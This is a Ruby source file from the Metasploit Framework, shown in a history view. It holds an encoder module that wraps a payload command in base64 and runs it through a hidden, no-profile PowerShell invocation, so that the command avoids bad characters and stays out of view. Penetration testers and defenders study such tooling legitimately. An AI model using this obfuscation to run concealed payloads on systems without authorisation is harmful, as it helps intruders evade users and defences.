metasploit-framework/modules/encoders/cmd/powershell_base64.rb

55 lines
1.1 KiB
Ruby
Raw Normal View History

2014-02-08 19:09:57 +00:00
##
# This module requires Metasploit: http://metasploit.com/download
2014-02-08 19:09:57 +00:00
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
2016-03-08 13:02:44 +00:00
class MetasploitModule < Msf::Encoder
2014-02-08 19:09:57 +00:00
Rank = ExcellentRanking
def initialize
super(
'Name' => 'Powershell Base64 Command Encoder',
'Description' => %q{
This encodes the command as a base64 encoded command for powershell.
},
'Author' => 'Ben Campbell',
'Arch' => ARCH_CMD,
'Platform' => 'win')
end
#
# Encodes the payload
#
def encode_block(state, buf)
# Skip encoding for empty badchars
if state.badchars.length == 0
return buf
end
2014-02-08 19:16:42 +00:00
if (state.badchars.include? '-') || (state.badchars.include? ' ')
2014-02-08 19:09:57 +00:00
return buf
end
cmd = encode_buf(buf)
if state.badchars.include? '='
while cmd.include? '='
buf << " "
cmd = encode_buf(buf)
end
end
cmd
end
def encode_buf(buf)
2014-02-10 23:15:59 +00:00
base64 = Rex::Text.encode_base64(Rex::Text.to_unicode("cmd.exe /c start #{buf}"))
2014-02-08 19:29:01 +00:00
cmd = "powershell -w hidden -nop -e #{base64}"
2014-02-08 19:09:57 +00:00
end
end